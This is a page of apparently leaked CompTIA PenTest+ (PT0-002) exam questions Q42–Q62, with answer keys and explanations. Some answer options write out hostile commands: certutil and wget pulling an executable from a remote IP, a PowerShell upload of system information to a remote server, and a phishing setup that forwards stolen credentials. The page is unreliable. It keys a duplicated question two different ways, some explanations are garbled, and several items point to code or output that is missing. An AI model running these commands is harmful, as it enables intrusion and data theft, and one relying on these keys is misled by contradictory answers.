• Home
  • Blogs
  • PT0-002 Dumps 2024 New CompTIA PT0-002 Exam Questions [Q42-Q62]

PT0-002 Dumps 2024 New CompTIA PT0-002 Exam Questions [Q42-Q62]

Share

PT0-002 Dumps 2024 - New CompTIA PT0-002 Exam Questions

Free PT0-002 braindumps download (PT0-002 exam dumps Free Updated)

NEW QUESTION # 42
Which of the following is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten?

  • A. NIST SP 800-53
  • B. ISO 27001
  • C. GDPR

Answer: C

Explanation:
Explanation
GDPR is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten. GDPR stands for General Data Protection Regulation, and it is a law that applies to the European Union and the United Kingdom. GDPR gives individuals the right to request their personal data be deleted by data controllers and processors under certain circumstances, such as when the data is no longer necessary, when the consent is withdrawn, or when the data was unlawfully processed. GDPR also imposes other obligations and rights related to data protection, such as data minimization, data portability, data breach notification, and consent management. The other options are not regulatory compliance standards that focus on user privacy by implementing the right to be forgotten. NIST SP 800-53 is a set of security and privacy controls for federal information systems and organizations in the United States. ISO 27001 is an international standard that specifies the requirements for an information security management system.


NEW QUESTION # 43
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

  • A. The tester reached the end of the assessment time frame.
  • B. The tester completed the assigned part of the assessment workflow.
  • C. The tester found evidence of prior compromise within the data set.
  • D. The tester had the situational awareness to stop the transfer.

Answer: D

Explanation:
Explanation
Situational awareness is the ability to perceive and understand the environment and events around oneself, and to act accordingly. The penetration tester demonstrated situational awareness by stopping the transfer of PII, which was out of scope and could have violated the ROE or legal and ethical principles. The other options are not relevant to the situation or the decision of the penetration tester.


NEW QUESTION # 44
The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a
"probable port scan" alert in the organization's IDS?

  • A. Line 02
  • B. Line 07
  • C. Line 08
  • D. Line 01

Answer: C


NEW QUESTION # 45
A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?

  • A. GDB
  • B. SearchSpliot
  • C. Netcat
  • D. Burp Suite

Answer: A


NEW QUESTION # 46
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.
Which of the following changes should the tester apply to make the script work as intended?

  • A. Change line 2 to $ip= 10.192.168.253;
  • B. Move all the lines below line 7 to the top of the script.
  • C. Remove lines 3, 5, and 6.
  • D. Remove line 6.

Answer: C

Explanation:
https://www.asc.ohio-state.edu/lewis.239/Class/Perl/perl.html
Example script:
#!/usr/bin/perl
$ip=$argv[1];
attack($ip);
sub attack {
print("x");
}


NEW QUESTION # 47
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?

  • A. Encode64
  • B. Metadata removal
  • C. Encryption
  • D. Steganography

Answer: D


NEW QUESTION # 48
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Buffer overflows
  • B. Race-condition attacks
  • C. Cross-site scripting
  • D. Injection flaws
  • E. Ransomware attacks
  • F. Zero-day attacks

Answer: C,D

Explanation:
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring
Reference:
Cross-site scripting (XSS) and injection flaws are two of the web-application security risks that are part of the OWASP Top 10 v2017 list. XSS is a type of attack that injects malicious scripts into web pages or applications that are viewed by other users, resulting in compromised sessions, stolen cookies, or redirected browsers. Injection flaws are a type of attack that exploits a vulnerability in an application's data input or output, such as SQL injection, command injection, or LDAP injection, resulting in unauthorized access, data loss, or remote code execution. The other options are not part of the OWASP Top 10 v2017 list.


NEW QUESTION # 49
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

  • A. Known environment testing
  • B. Unknown environment testing
  • C. Partially known environment testing
  • D. Physical environment testing

Answer: B


NEW QUESTION # 50
Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

  • A. A red-team assessment
  • B. A compliance-based assessment
  • C. A known-environment assessment
  • D. An unknown-environment assessment

Answer: A

Explanation:
Explanation
A red-team assessment is a type of penetration testing that simulates a real-world attack scenario with the goal of accessing specific data or systems. A red-team assessment is different from an unknown-environment assessment, which does not have a predefined objective and focuses on discovering as much information as possible about the target. A known-environment assessment is a type of penetration testing that involves cooperation and communication with the target organization, and may not focus on specific data or systems. A compliance-based assessment is a type of penetration testing that aims to meet certain regulatory or industry standards, and may not focus on specific data or systems.


NEW QUESTION # 51
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

  • A. Eliminating the potential for false positives
  • B. Reducing the risk to the client environment
  • C. Reprioritizing the goals/objectives
  • D. Maximizing the likelihood of finding vulnerabilities

Answer: C

Explanation:
Goal Reprioritization Have the goals of the assessment changed? Has any new information been found that might affect the goal or desired end state? I would also agree with A, because by goal reprioritization you are more likely to find vulnerabilities in this specific segment of critical network, but it is a side effect of goal reprioritization.


NEW QUESTION # 52
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?

  • A. Encode64
  • B. Steganography
  • C. Metadata removal
  • D. Encryption

Answer: C

Explanation:
Explanation
All other answers are a form of encryption or randomizing the data.


NEW QUESTION # 53
The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

  • A. Line 19
  • B. Line 8
  • C. Line 20
  • D. Line 13

Answer: B

Explanation:
$X=2,4,6,8,9,20,5
$y=[System.Collections.ArrayList]$X
$y.RemoveRange(1,2) As you can see the arrat has no brackets and no periods. IT HAS SEMICOLLINS TO SEPERATE THE LISTED ITEMS OR VALUES.


NEW QUESTION # 54
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

  • A. nmap -sS -sL -p80 192.168.1.20
  • B. nmap -O -v -p80 192.168.1.20
  • C. nmap -A -T4 -p80 192.168.1.20
  • D. nmap -f -sV -p80 192.168.1.20

Answer: C

Explanation:
This command will scan the host 192.168.1.20 on port 80 using the following options:
* -A: This option enables OS detection, version detection, script scanning, and traceroute. This will help to determine if the host is running an approved version of Linux and a patched version of Apache, as well as other information about the host and the network path.
* -T4: This option sets the timing template to aggressive, which speeds up the scan by increasing the number of parallel probes, reducing the timeouts, and assuming faster responses.
* -p80: This option specifies the port to scan, which is 80 in this case. Port 80 is commonly used for HTTP services, such as Apache web server.


NEW QUESTION # 55
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Implement multifactor authentication on all corporate applications.
  • B. Implement an email security gateway to block spam and malware from email communications.
  • C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • D. Implement a recurring cybersecurity awareness education program for all users.

Answer: D

Explanation:
Explanation
The simulated phishing attack showed that most of the employees were not able to recognize or avoid a common social engineering technique that could compromise their corporate credentials and expose sensitive data or systems. The best way to address this situation is to implement a recurring cybersecurity awareness education program for all users that covers topics such as phishing, password security, data protection, and incident reporting. This will help raise the level of security awareness and reduce the risk of falling victim to phishing attacks in the future. The other options are not as effective or feasible as educating users about phishing prevention techniques.


NEW QUESTION # 56
A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?

  • A. Application failures
  • B. Bandwidth limitations
  • C. Patch installations
  • D. Successful exploits

Answer: D

Explanation:
Explanation
Successful exploits could cause network disruptions, service outages, or data corruption, which could affect the connectivity and functionality of the oil rig network. Patch installations, application failures, and bandwidth limitations are less likely to be related to the penetration testing activities.


NEW QUESTION # 57
A penetration tester runs the following command:
nmap -p- -A 10.0.1.10
Given the execution of this command, which of the following quantities of ports will Nmap scan?

  • A. 65,535
  • B. 10,000
  • C. 1,000
  • D. 1,024

Answer: A

Explanation:
The nmap command with the -p- flag scans all ports from 1 to 65535 on the target host. The -A flag enables OS detection, version detection, script scanning, and traceroute. Therefore, the command will scan 65,535 ports on the host 10.0.1.10 and perform additional analysis on the open ports. References:
*The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 2: Conducting Passive Reconnaissance, page 72-73.
*Nmap Cheat Sheet 2024: All the Commands & Flags - StationX1
*Nmap Commands - 17 Basic Commands for Linux Network - phoenixNAP2


NEW QUESTION # 58
In Python socket programming, SOCK_DGRAM type is:

  • A. matrixed.
  • B. reliable.
  • C. connectionless.
  • D. slower.

Answer: C

Explanation:
Explanation
Connectionless due to the Datagram portion mentioned so that would mean its using UDP.


NEW QUESTION # 59
For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to
https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

  • A. window.location.= 'https://evilcorp.com'
  • B. crossDomain: true
  • C. redirectUrl = 'https://example.com'
  • D. geturlparameter ('username')

Answer: B


NEW QUESTION # 60
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
  • C. certutil-urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • D. wget http://192.168.2.124/windows-binaries/accesschk64.exe-Oaccesschk64.exe

Answer: C

Explanation:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
The certutil command is a Windows utility that can be used to manipulate certificates and certificate authorities.
However, it can also be abused by attackers to download files from remote servers using the -urlcache option.
In this case, the command downloads accesschk64.exe from http://192.168.2.124/windows-binaries/ and saves it locally. Accesschk64.exe is a tool that can be used to check service permissions and identify potential privilege escalation vectors. The other commands are not relevant for this purpose. Powershell is a scripting language that can be used to perform various tasks, but in this case it uploads a file instead of downloading one. Schtasks is a command that can be used to create or query scheduled tasks, but it does not help with service permissions. Wget is a Linux command that can be used to download files from the web, but it does not work on Windows by default.


NEW QUESTION # 61
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

Which of the following is the penetration tester conducting?

  • A. Credential stuffing
  • B. Port scan
  • C. Brute force
  • D. DoS attack

Answer: C

Explanation:
The output shows multiple login attempts with different passwords for the same username "root" on the IP address 192.168.1.112. This is indicative of a brute force attack, where an attacker systematically tries various password combinations to gain unauthorized access. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 4: Conducting Passive Reconnaissance; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 4: Conducting Active Reconnaissance.


NEW QUESTION # 62
......


CompTIA PT0-002 or the CompTIA PenTest+ Certification exam is a valuable credential for cybersecurity professionals who want to expand their skill set and demonstrate their expertise in penetration testing and ethical hacking. PT0-002 exam covers a wide range of topics and requires candidates to have both theoretical knowledge and practical experience. CompTIA PenTest+ Certification certification is globally recognized and can help professionals advance their careers in the cybersecurity industry.


CompTIA PT0-002 exam comprises 85 multiple-choice and performance-based questions, and it takes 165 minutes to complete. Candidates who want to take the exam are advised to have a minimum of two years of experience in information security and knowledge of multiple operating systems, networking protocols, and programming languages.

 

Verified PT0-002 dumps Q&As - Pass Guarantee Exam Dumps Test Engine: https://www.suretorrent.com/PT0-002-exam-guide-torrent.html

PT0-002 Dumps for Pass Guaranteed - Pass PT0-002 Exam: https://drive.google.com/open?id=1o2iMrEd0CGW4y0pV4fncwM_7xsp8a0qZ

Related Blogs

more
CompTIA PT0-002 Certification Practice Exam

Copyright © 2026 SURETORRENT.COM. All rights reserved. All trademarks are the property of their respective owners and we don't provide actual questions from any vendor.